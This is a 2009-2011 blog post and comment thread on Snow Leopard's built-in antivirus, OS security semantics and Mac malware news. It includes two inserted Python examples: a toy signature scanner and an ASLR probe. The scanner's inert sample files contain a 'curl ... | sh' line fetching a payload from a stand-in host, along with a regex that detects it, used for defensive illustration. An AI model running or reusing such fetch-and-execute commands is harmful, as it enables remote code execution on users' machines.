Built-in antivirus for OS X


in Geek stuff, Internet matters, Security

Rumours are circulating that Apple’s Snow Leopard OS will include antivirus capabilities. This is a welcome development. While OS X rightly has a good reputation for security, no commercial operating system is immune from malware. In addition to malware that targets OS X itself, there are exploits that arrive through cross-platform software such as Flash and Adobe PDF readers, and even through specific pieces of hardware.

Adding antivirus protection might be a bit of a public relations blow to Apple, which has cultivated a false sense that there is no malware that affects Macs. Nevertheless, it is a good security move. Indeed, the server version of OS X has included such capabilities for some time: Mac OS X Server ships the ClamAV scanner as part of its mail service.


BuddyRich August 27, 2009 at 6:55 am

The keyboard firmware hack was the best. I’ll be sure to tackle anyone walking around with an unplugged apple keyboard heading towards my MBP!

In all honesty, this development is long overdue. Macs are no more innately secure than Windows, they just have a lower profile, and hence get less attention from the hackers.

I am looking forward to Snow Leopard’s release this Friday, and for only $29 to upgrade it’s practically a steal.

Milan August 27, 2009 at 8:20 am

While $30 won’t break the bank, Snow Leopard doesn’t seem to have many new consumer-focused features: just behind the scenes changes and some general tweaks.

Certainly nothing as essential as Time Machine, which is one of the best things added to any OS ever, when it comes to the average user. Suddenly, it was possible for the computer-illiterate to have good regular backups.

. August 27, 2009 at 8:22 am

Snow Leopard: The Reviews Are In
Posted by Steven Leckart

Is Apple’s upgraded OS totally awesome, yawn-worthy, or a bit of both?

Find out what reviewers at the NYT, WSJ, Gizmodo, Wired and others think, over at BBG.

. August 27, 2009 at 8:34 am

11 Major New Snow Leopard Features

Macworld staff, Macworld.com

Wednesday, August 26, 2009 6:40 PM PDT

. August 27, 2009 at 11:03 am

Snow Leopard review
by Joshua Topolsky posted Aug 26th 2009 at 9:01PM

Snow Leopard. Even the name seems to underpromise — it’s the first “big cat” OS X codename to reference the previous version of the OS, and the list of big-ticket new features is seemingly pretty short for a version-number jump. Maybe that’s why Apple’s priced the 10.6 upgrade disc at just $29 — appearances and expectations matter, and there’s simply not enough glitz on this kitty to warrant the usual $129.

But underneath the customary OS X fit and finish there’s a lot of new plumbing at work here. The entire OS is now 64-bit, meaning apps can address massive amounts of RAM and other tasks go much faster. The Finder has been entirely re-written in Cocoa, which Mac fans have been clamoring for since 10.0. There’s a new version of QuickTime, which affects media playback on almost every level of the system. And on top of all that, there’s now Exchange support in Mail, iCal, and Address Book, making OS X finally play nice with corporate networks out of the box.

So you won’t notice much new when you first restart into 10.6 — apart from some minor visual tweaks here and there, there’s just not that much that stands out. But in a way that means the pressure’s on even more: Apple took the unusual and somewhat daring step of slowing feature creep in a major OS to focus on speed, reliability, and stability, and if Snow Leopard doesn’t deliver on those fronts, it’s not worth $30… it’s not worth anything. So did Apple pull it off? Read on to find out!

Tristan August 27, 2009 at 11:09 am

I think “innate security” of an OS is silly. All that matters is how actually secure it is. And how actually secure an OS is has to do with, among other things, the quantity of malware written for it.

Milan August 27, 2009 at 11:28 am

Computers basically cannot be innately secure, because they are innately permissive. They have no judgment and do exactly what they are told. As long as people keep finding ways to make machines accept their commands (using tricks like buffer overflows, etc), machines will be happy to do whatever they request afterwards.

That being said, it is a lot harder to execute arbitrary code in a well-designed OS than in a sloppily designed one. For instance, versions of Windows where default accounts are all admins are fundamentally vulnerable to attack.

Tristan August 27, 2009 at 12:02 pm

My point is the theory is dispensable – what matters is how secure the systems are in reality. In practice, how often does computer X get infected with malware, not, “in theory, with an equal number of monkeys working at an equal number of malware development stations, which system would become more infected”.

Milan August 27, 2009 at 1:26 pm

Fair enough, though security through obscurity isn’t a great strategy either. Relying on the fact that nobody is attacking your obscure platform or software is a strategy that can fail catastrophically as soon as someone tries.

R.K. August 27, 2009 at 4:39 pm

Note that the Snow Leopard upgrade breaks some software:

Adobe Photoshop CS2
Fallout II
Google Gears
Parallels 3.0
PGP Desktop
PGP Whole Disk Encryption


Matt August 27, 2009 at 4:44 pm

I’m anticipating the arrival of both operating systems (OS X and Windows 7). I’ve owned a 64bit capable computer since 2005, but these will be my first attempts at a 64 bit operating system.

Regarding Snow Leopard not running previous software, such is life. I suspect the upgrade to 64bit makes it difficult to accommodate previous software. I think a bigger issue is that OS X 10.6 will only run on Intel Macs. Any PPC users are stuck with older versions.

BuddyRich August 27, 2009 at 5:04 pm

Thank you Milan. That was what I meant by prefacing innately to what I was saying.

In reality Windows does have 100 times (if not more!) malware written for it, making it the higher risk to run. However the two variables that make it so (time and effort of hackers) are outside of the OS’ control and can also change over time, making any assertion of relative security specific to the moment in time the statement is made.

In essence though the difference between Windows with Anti Virus and OSX without is like comparing a house with a locked door to one with an unlocked one. Sure in reality the unlocked one is safe because no one is trying to get in, but that doesn’t change the fact that a locked door is innately safer.

R.K. August 27, 2009 at 5:09 pm

Regarding Snow Leopard not running previous software, such is life.

True, but a lot of people are going to need to pirate newer versions of Photoshop, which is a pain. Not least because so many of them are laden with tacked-on malware.

BuddyRich August 27, 2009 at 5:20 pm

I quite liked XP x64 (which is more akin to Win Server 2003 than XP) and still run it. I never went to Vista, but I have the half price Win7 Pro on preorder and have the 32bit RC on an older PC slated to be donated to charity and really like it. Especially since it runs well on an older Northwood 2GHz P4 with only 512MB of DDR RAM. Granted, the wipe and fresh OS install helped, but it still feels fairly fast compared to Vista on the same box.

Regarding the apps not compatible, my biggest concern is minor bugs with Photoshop CS3, which was not on that list RK mentioned. Though I don’t know what those bugs are, I got my info from this site:


Matt August 27, 2009 at 5:37 pm

True, but a lot of people are going to need to pirate newer versions of Photoshop, which is a pain. Not least because so many of them are laden with tacked-on malware.

That’s probably the best way to get one’s not-so-desirable code to execute on OS X: put it into an installer for pirated software. That way the person enters their password (or in my case and others, leaves it blank because that IS their password) and the code can run.

Emily August 27, 2009 at 6:37 pm


Thanks for the heads up. I’m doing some tech support for Macs right now, so I expect lots of confused people asking questions after the upgrade.

Tristan August 27, 2009 at 8:39 pm

“Sure in reality the unlocked one is safe because no one is trying to get in, but that doesn’t change the fact that a locked door is innately safer”

So, first you empty “innately” of any meaning in reality, and then you re-assert it?

Milan August 27, 2009 at 8:58 pm

My legitimately purchased version of Photoshop is CS1.

Will Snow Leopard break it?

Losing it and TextMate would be savage blows from the snow-dusted cat.

R.K. August 27, 2009 at 9:17 pm

If it breaks CS2, it seems a fair bet it will break CS.

BuddyRich August 27, 2009 at 11:39 pm

I did. I think we are arguing semantics. Perhaps a better word would be intrinsic.

Semantically, how do you define “security”, and more importantly assess it? Does the assessment to determine if something is “secure” or not include only an evaluation of the mechanisms that prevent harm or does the assessment also include the larger context of the number of threats as well?

I think most people don’t think in terms of the larger context when they call something “secure” or not. They would call something “secure” based on the mechanisms alone. I would call the number of threats “risk level” or something like that.

I think the problem is when we try to reconcile the two conditions into one term, security. And then we go and do a relative comparison on top of that! Something can be highly secured yet high at risk, while another can be not secured but low at risk. Because it is high at risk, doesn’t change the fact that its highly secured, just like the fact that something is low at risk, does not change the fact that something is not secure.

Tristan August 28, 2009 at 3:28 am

Call it “innate” or “intrinsic” if you want, what you really mean is outside the real world. Things are only secure or not with reference to real world threat, not ideal ones. So, there is no such thing as “innate” security because outside of the context of actual existent malware, no threats exist at all. No system can be “more innately secure” than any other because “innately” no system is secure at all, or every system is perfectly secure, because “security” has no meaning at all in that context.

Tristan August 28, 2009 at 3:32 am

“They would call something “secure” based on the mechanisms alone.”

Then they are an idiot and should be ignored – because mechanisms are only “secure” insofar as they work with reference to actual threats.

Calling a system “innately secure” is like calling a car “innately safe” without knowing what kind of context it will be operated in. If you don’t know in advance whether the threats are normal road type or demolition derby time or road salt type or driving underwater type, the notion of “safety” can not be applied to the car at all.

And ya, this is semantics. Semantics concerns what words mean. So, if we want to talk to each other, it might be a bit important to discuss “semantics” in cases where it is unclear what the words we are using mean.

BuddyRich August 28, 2009 at 7:13 am

This could get very philosophical but I actually agree with you on this point (I wouldn’t use the strong language you use though):

“Then they are an idiot and should be ignored – because mechanisms are only “secure” insofar as they work with reference to actual threats.”

Yet the common usage of the word is often meant objectively, simply meaning how “locked” something is. It’s like saying 1024 bit encryption is more secure than 128 bit encryption. I think that is a true and fair statement. It certainly is if no additional context is given. Can you agree to that?

If using your larger context definition it might not be true if half the world is trying to break the 1024 bit encryption and only one person is trying to break the 128 bit encryption.

R.K. August 28, 2009 at 9:34 am

Encryption with more bits can actually be weaker in some cases. For instance, AES-256 has a ‘lousy’ key schedule, whereas AES-128 does not. As a result, AES-256 is vulnerable to attacks that are infeasible against AES-128.

Milan August 28, 2009 at 9:47 am

These semantic arguments are tiring, and personal attacks are never welcome.

The people you are debating may be incorrect, but it is never productive to call them ‘idiots.’

Tristan August 28, 2009 at 12:24 pm

I didn’t engage in a personal attack. If you read what I said, I said people who believe a house is secure because it is locked, without reference to the fact it exists in a world, are idiots. However, I sincerely doubt that these “people” who R. K. seems to think are everywhere actually exist. When people say locked is more secure than unlocked, they assume a consistent context over both situations in order to compare them – this is not the same as considering the lock without reference to any possible attacks. So, unless someone can prove that people are actually deeply confused about security, it isn’t a personal attack.

“Its like saying 1024 bit encryption is more secure than 128 bit encryption. I think that is a true and fair statement. It certainly is if no additional context is given.”

R.K., your mistake here is to infer from the fact that no context is given, to the unjustified and unargued assertion that no context is implied. What is implied in the “more secure” here is that the context is the same for both levels of encryption. 1024 bit is more secure than 128 given the same degree and intensity of attack. This is a useful and justifiable assumption when comparing PCs with PCs – Macs are secure because they cannot be compared with PCs with respect to intensity or numbers of attacks. I’m not the only one who understands this – a large part of Mac’s marketing strategy is hinged on just this fact about security.

Tristan August 28, 2009 at 12:26 pm

Sorry, I should have referred to BuddyRich not R.K. in the last post.

. August 28, 2009 at 4:51 pm

Conventional wisdom is that everything ran great at Apple during the six-month period when CEO Steve Jobs was out having his super-secret liver transplant. Supposedly, the company just kept running without a hiccup. But after unimpressive reports on the performance of Snow Leopard, the new version of the Mac OS X operating system, I’m starting to have my doubts.

R.K. August 28, 2009 at 6:34 pm

For something to be ‘secure,’ it needs to be able to avoid harm from agents that maliciously attack it as well as recover quickly when such attacks succeed. It may also be important to adapt to past attacks, identify attackers, and sometimes initiate active counterattacks.

The key difference between ‘safety’ and ‘security’ is that safety is resilience in the face of non-actor risks, such as weather. Security, by contrast, is all about things that intentionally attack you.

It is possible to be very secure against some threats, while very vulnerable to others. For instance, an airplane might be well protected against antiaircraft guns and missiles, but not protected from being hijacked by someone aboard.

Things aren’t really ‘secure’ or ‘insecure.’ They are just secure or insecure relative to situations: either the one they are in, or one they might find themselves in. For instance, a lightly armoured car might be quite adequate for Paris, but not for Baghdad.

It does seem fair to say that one operating system is inherently more secure than another, relative to a particular threat or attacker. Features like limiting what low-level users can do, and implementing permissions for files and folders, give UNIX systems some claim to being inherently more secure than Windows systems.

Milan August 28, 2009 at 6:54 pm

Security is immunity from the will of others.

Matt August 29, 2009 at 1:38 pm

Features like limiting what low-level users can do, and implementing permissions for files and folders, give UNIX systems some claim to being inherently more secure than Windows systems.

Windows has had permissions since Windows NT. Windows XP includes permissions, as well as different privileges for different user accounts. You should see how locked down the IT department at my work has its XP machines. Without admin rights, they won’t let you do much.

Tristan August 29, 2009 at 4:06 pm

I like Milan’s definition.

R.K. August 29, 2009 at 7:39 pm

immunity from the will of others

Concise and correct.

Hell is other people (L’enfer, c’est les autres). Of course, heaven is also others.

Tristan August 30, 2009 at 2:43 am

“It does seem fair to say that one operating system is inherently more secure than another, relative to a particular threat or attacker.”

Yes. Exactly. And because no particular threat or attacker is constant across different OS’s, it doesn’t make a lot of sense to say one kind of system is inherently more secure than another. In fact, it might be that the notion of “inherently” just doesn’t mean much when applied to situations in the world where the context can’t be idealized as uniform.

. August 30, 2009 at 11:04 am

The Story of a Simple and Dangerous OS X Kernel Bug

“At the beginning of this month the Mac OS X 10.5.8 update closed a kernel vulnerability that lasted more than 4 years, covering all the 10.4 and (almost all) 10.5 Mac OS X releases. This article presents some twitter-size programs that trigger the bug. The mechanics are so simple that they can be easily explained to anybody possessing some minimal knowledge about how operating systems work. Besides being a good educational example, this is also a scary proof that very mature code can still be vulnerable in rather unsophisticated ways.”

. August 30, 2009 at 11:10 am

Adobe Creative Suite and Snow Leopard: what you should know: Adobe has drawn the line in the sand between Intel and PPC for upcoming versions of its Creative Suite, and now it’s doing so again between CS3 and CS4 when it comes to Snow Leopard support. It might not please everyone, but that’s the price some of us pay for staying on the cutting edge.

Milan August 30, 2009 at 12:48 pm

And because no particular threat or attacker is constant across different OS’s, it doesn’t make a lot of sense to say one kind of system is inherently more secure than another.

There are some kinds of attacks that can be targeted against multiple operating systems. For instance, attempts to hijack SSL via man-in-the-middle attacks, or trying to exploit vulnerabilities in cross-platform applications like Flash and Adobe PDF.

There are also tactics that theoretically work with all operating systems, such as the buffer overflows mentioned above.

Virtualization may further increase the range of threats that are cross-platform.

. August 31, 2009 at 12:58 pm

Snow Leopard includes several security enhancements. According to Apple, Snow Leopard supports 64-bit applications, which the company claims are more secure than 32-bit applications because of the way the operating system handles function-passing. Mac OS X 10.6 also includes hardware-based execution control for heap memory, stronger checksums for preventing memory corruption attacks, and antivirus capabilities.

Symantec, a leading maker of security software, says Snow Leopard’s File Quarantine feature only offers basic malware protection. “It is not a full-featured antivirus solution and does not have the ability to remove malware from the system,” the company said in an e-mailed statement. “File Quarantine is also signature-based only. Malware signatures are only as good as the definitions, requiring Apple to provide regular, timely updates.”

Symantec also notes that Mac OS X’s Software Update mechanism is not fully automatic and lacks a user interface to see which signatures have been downloaded.

Symantec also observes that Apple’s security enhancements do not protect against unauthorized access to sensitive files or block the transmission of sensitive information, like Norton Internet Security for the Mac. The company also says that Mac OS X’s firewall is turned off by default and isn’t as configurable as its product.
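The signature-only caveat in the statement above, as an added example that is not part of the original post and not Apple’s or Symantec’s code: a minimal hash-and-pattern scanner run over constructed, inert sample files. The definition format, the sample contents and the names are invented for illustration and are not XProtect’s format.

```python
"""Added example: a toy signature scanner, to show why signature-based
detection is only as good as its definition list. Not Apple's code; the
definition format and samples below are invented for illustration."""
import hashlib
import re

# --- constructed sample files (inert shell text, not real malware) ---
ORIGINAL = (
    b"#!/bin/sh\n"
    b"echo 'Installing keygen...'\n"
    b"curl -s http://dropper.invalid/stage2 | sh\n"
)
# Same dropper with a comment line inserted: a different file, same behaviour.
REPACKED = ORIGINAL.replace(b"#!/bin/sh\n", b"#!/bin/sh\n# build 2\n")
# Same behaviour again, but the flag is spelled differently.
REWRITTEN = ORIGINAL.replace(b"curl -s ", b"curl --silent ")
CLEAN = b"#!/bin/sh\necho 'hello'\n"


def sha1_hex(data: bytes) -> str:
    return hashlib.sha1(data).hexdigest()


# Two styles of definition: a whole-file hash and a byte regex. The hash is
# computed from the sample so the example is self-contained.
DEFINITIONS = [
    {"name": "Example.Dropper.A.hash", "kind": "sha1",
     "value": sha1_hex(ORIGINAL)},
    {"name": "Example.Dropper.A.pattern", "kind": "regex",
     "value": re.compile(rb"curl -s https?://[^\s/]+/stage2 \| sh")},
]


def scan(data: bytes, definitions=DEFINITIONS) -> list:
    """Return the names of definitions that match `data`.
    Detection only: like the File Quarantine behaviour described above,
    nothing is removed or repaired."""
    hits = []
    digest = sha1_hex(data)
    for d in definitions:
        if d["kind"] == "sha1" and d["value"] == digest:
            hits.append(d["name"])
        elif d["kind"] == "regex" and d["value"].search(data):
            hits.append(d["name"])
    return hits


def coverage_report() -> dict:
    """Scan each constructed sample; each trivial edit shrinks coverage."""
    samples = [("original", ORIGINAL), ("repacked", REPACKED),
               ("rewritten", REWRITTEN), ("clean", CLEAN)]
    return {name: scan(blob) for name, blob in samples}


if __name__ == "__main__":
    for name, hits in coverage_report().items():
        print(f"{name:10s} -> {hits or 'no detection'}")
```

Run it and the repacked variant is caught only by the byte pattern, while the rewritten variant, which does exactly the same thing, is caught by nothing. A definition list detects what it was written for, and its coverage lasts only until the next small edit to the sample, which is why the timeliness of definition updates matters as much as their existence.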

. September 3, 2009 at 12:05 pm

Snow Leopard ‘downgrades’ Flash to vulnerable version

Apple ships outdated Flash with OS upgrade; users must manually update to stay safe
By Gregg Keizer
September 3, 2009 11:46 AM ET

Apple has shipped an out-of-date and vulnerable version of Adobe Flash Player with Snow Leopard, security companies have warned.

Worse, say experts, is that Snow Leopard silently “downgrades” once-secure editions of Flash Player to the buggy version that ships with the Mac OS X 10.6 operating system upgrade.

On Monday, Intego, an Austin, Texas firm that specializes in Mac security software, noted that Snow Leopard installs Flash Player The current version of Flash Player for the Mac, however, is actually “It seems that Apple is shipping an outdated, even dangerous version of Flash Player,” Intego spokesman Peter James said on a company blog.

Milan September 3, 2009 at 12:27 pm

These flash issues are all the more reason to use Firefox and NoScript.

The latter can be annoying to use, since you need to manually whitelist sites, but it significantly reduces your exposure to new and existing vulnerabilities.

Matt September 3, 2009 at 4:42 pm

The issue of OS X shipping with an older version of something or other doesn’t really faze me, provided the OS updater downloads new versions after an install. In a year, presumably many things on the disc will be out of date and people doing re-installs from the disc they bought in September 2009 will have to update anyway.

The disc that shipped with my 2005 laptop is Windows XP home SP2. Many updates, including a service pack has been released since then. If I ever do a reinstall, I expect to just download the updates from Microsoft’s site.

Milan September 3, 2009 at 4:44 pm

It may be weeks before Apple issues a security update that includes the new version of Flash.

Milan September 3, 2009 at 4:46 pm

A manual patch is available from Adobe.

Apparently, Windows XP SP3 also shipped with a vulnerable version of Flash, which I think further demonstrates the value of taking secondary precautions, like using NoScript.

. September 11, 2009 at 10:13 am

Mac OS X 10.6.1 update now live

Well, that was fast — just over a week after Snow Leopard officially shipped, the first update’s on the books. Nothing major in the changelog here, but we’re told Flash has been updated to a newer, more secure version. Let us know how it goes for you, eh?

. September 16, 2009 at 11:29 am

Snow Leopard Missed a Security Opportunity

By kdawson on where-did-you-put-it-what-you-know-where-do-you-think-oh

CWmike writes “Apple missed a golden opportunity to lock down Snow Leopard when it again failed to implement fully a security technology that Microsoft perfected nearly three years ago in Windows Vista, noted Mac researcher Charlie Miller said today. Dubbed ASLR, for address space layout randomization, the technology randomly assigns data to memory to make it tougher for attackers to determine the location of critical operating system functions, and thus makes it harder for them to craft reliable exploits. ‘Apple didn’t change anything,’ said Miller, of Independent Security Evaluators, the co-author of The Mac Hacker’s Handbook, and winner of two consecutive ‘Pwn2own’ hacker contests. ‘It’s the exact same ASLR as in Leopard, which means it’s not very good.'”
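A way to test the ASLR claim quoted above for yourself, as an added example that is not part of the original post and not Miller’s or Apple’s tooling: launch a fresh interpreter several times and record where a heap buffer and a libc function land in each child. A region that comes back at the same address on every run is not being randomised. The probe script, region names and run count are the example’s own assumptions; it covers heap and shared-library addresses only, since stack and executable bases are not reachable from Python without native code, and the result naturally depends on the host it is run on.

```python
"""Added example: measure per-region address randomisation by sampling
fresh processes. Not Miller's or Apple's code; heap and shared-library
regions only."""
import subprocess
import sys

# Code run in each child. It reports the address of a heap allocation
# (ctypes mallocs buffers above a small size threshold) and the address of
# libc's malloc, i.e. a shared-library text address.
_PROBE = r"""
import ctypes, ctypes.util
buf = ctypes.create_string_buffer(4096)                      # heap
libc = ctypes.CDLL(ctypes.util.find_library('c') or None)    # libc handle
heap = ctypes.addressof(buf)
lib = ctypes.cast(libc.malloc, ctypes.c_void_p).value
print(heap, lib)
"""


def sample_addresses(runs: int = 8) -> dict:
    """Return {'heap': [...], 'library': [...]}, one address per child run."""
    heap, lib = [], []
    for _ in range(runs):
        out = subprocess.run([sys.executable, "-c", _PROBE],
                             capture_output=True, text=True,
                             check=True).stdout.split()
        heap.append(int(out[0]))
        lib.append(int(out[1]))
    return {"heap": heap, "library": lib}


def randomisation_summary(runs: int = 8) -> dict:
    """Map region -> number of distinct addresses seen across `runs` launches.
    A value of 1 means the region sat at a fixed address every time, i.e. it
    is not randomised; a value close to `runs` means it moves per process."""
    samples = sample_addresses(runs)
    return {region: len(set(addrs)) for region, addrs in samples.items()}


if __name__ == "__main__":
    runs = 8
    for region, distinct in randomisation_summary(runs).items():
        if distinct == 1:
            verdict = "fixed address, not randomised"
        else:
            verdict = f"{distinct}/{runs} distinct addresses"
        print(f"{region:8s}: {verdict}")
```

The same technique, with a native helper to print a stack address and the executable’s base, is how the per-region gaps Miller refers to (heap, stack and loader left in place while libraries move) are checked on any platform: count distinct addresses per region, not whether “ASLR is on”.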

. October 5, 2009 at 4:48 pm

How would you change Snow Leopard?

Ah, Snow Leopard. It’s the same cat you’re used to caressing (or beating, as the case may be), but in a much, much colder climate. Or something like that. OS X 10.6 promised Leopard users a “refined” experience, and one that would only cost upgrading users $29. At that price, most Apple fanatics figured that picking it up on launch day was a no-brainer, but as we’ve come to sadly expect from Cupertino’s software labs these days, all wasn’t perfectly well with the big snowy cat. Even now, users are still kvetching about broken functionality and mental pains that are literally indescribable. Even if you’re not in that camp, we’re eager to hear how your Snow Leopard experience has been. Are you satisfied with the upgrade? Will you never, ever install an Apple update again before a million others try it first? Are you already looking forward to 10.7 Windows 7? Tell all in comments below — you never know who could be tuning in.

. October 12, 2009 at 3:05 pm

Snow Leopard guest account bug deletes user data

By AppleInsider Staff
Published: 01:10 PM EST

Reports of a potentially critical Snow Leopard bug that can erase a user’s account data have continued to surface since the operating system’s debut.

Since Mac OS X 10.6 launched in late August, numerous reports online have detailed the issue, which is triggered by logging in and out of a guest account on a Snow Leopard machine. Upon logging back in to their regular account, users will find that it has been wiped of all data.

. October 20, 2009 at 5:33 pm

“I bought Photoshop CS4 (Windows) on eBay (I know, dumb, dumb, dumb, and more dumb). Packaging, product numbers, and dvds looked real, and it worked for exactly 30 days. Adobe says that serial number is invalid. Have read stories on Internet about trojans in MAC Photoshop CS4 software. I’ve run spyware and virus scans and turn up nothing. Is there any way I can be sure that this counterfeit software hasn’t left a rootkit or something else nasty on my computer. Thanks!”

. November 21, 2009 at 6:49 pm

First Malicious iPhone Worm In the Wild

“After the ikee worm that displayed a picture of Rick Astley on jailbroken iPhones, the first malicious iPhone worm (Google translation; original, in Dutch) has now been discovered in the wild. Internet provider XS4ALL in the Netherlands encountered several such devices (link in Dutch) on the wireless networks of their customers and put out a warning. After obtaining a copy of the malware it was discovered that the jailbroken phones, which are exploited through OpenSSH with a default password, scan IP ranges of mobile internet providers for other vulnerable iPhones, phone home to a C&C botnet server, are able to update themselves with additional malware and have the ability to dump the SMS database as well. Owners of a jailbroken iPhone with a default root password are advised to flash to the latest Apple firmware in order to ensure no malware is present.”

Milan January 18, 2010 at 6:48 pm

Once again, the importance of implementation is demonstrated: even implementations of quantum cryptography can be broken.

. January 26, 2010 at 9:33 am

Intego’s “Year In Mac Security” Report

“Mac OS X and iPhones that haven’t been jailbroken fare pretty well (although vulnerabilities exist, there’s not been a lot of exploitation). Apple does come in for criticism for ‘time to fix’ known vulnerabilities. Jailbroken iPhones are a mess. The biggest risk to Macs are Trojan horses, often from pirated software.”

Milan May 24, 2010 at 10:25 am

Over the past few months, my iMac became woefully slow and buggy. It was my hope that upgrading to Snow Leopard might unclutter it a bit. Thankfully, it has done exactly that.

Because the Snow Leopard installer wouldn’t recognize my hard drive as a valid installation target, I had to back everything up using Time Machine (and a few DVDs for really critical files) and then do a low-level format on the drive.

So as to still have iPhoto, I then used the system recovery feature on the Mac OS boot disc to copy all my data back from the external drive. The Snow Leopard installer was then happy to run.

Everything is working better and more smoothly. Programs load faster, even websites, and the system feels zippy and stable.

. November 2, 2010 at 5:56 pm

SecureMac and Intego, among other security firms, today alerted the Mac community to a new Trojan threat, trojan.osx.boonana.a (Intego gives it the name OSX/Koobface.a), which is spreading via social networking sites like Facebook and e-mail. The trojan appears as a link in messages with the subject “Is this you in this video?”, and when users click on the link, a Java applet downloads an installer, which modifies system files to bypass passwords and other protections….

. May 15, 2011 at 4:53 pm

A new piece of malware is spreading, notable because it targets computers running Mac OS X, rather than Windows. Reports of the trojan “MAC Defender” (aka Mac Protector, aka Mac Security) first surfaced on May 2, but the malware has since morphed and proliferated.

The basics: it spreads as search engine optimization (SEO) poisoning, using popular search terms for prominent search engine results.

. May 25, 2011 at 12:11 am

“That’s new ground for Apple,” Storms said, pointing out that the move is a first for the company, which until now has only offered a bare-bones malware detection mechanism in Mac OS X 10.6, aka Snow Leopard, and then only populated it with a handful of signatures.

“Not only is Apple going to help customers remove [Mac Defender], but by doing so, they’re also admitting that there are security problems with Mac OS,” Storms said.

MacDefender — which also goes by names such as MacProtector and MacSecurity — first popped up earlier this month when French security company Intego said it had found the scareware in the wild.
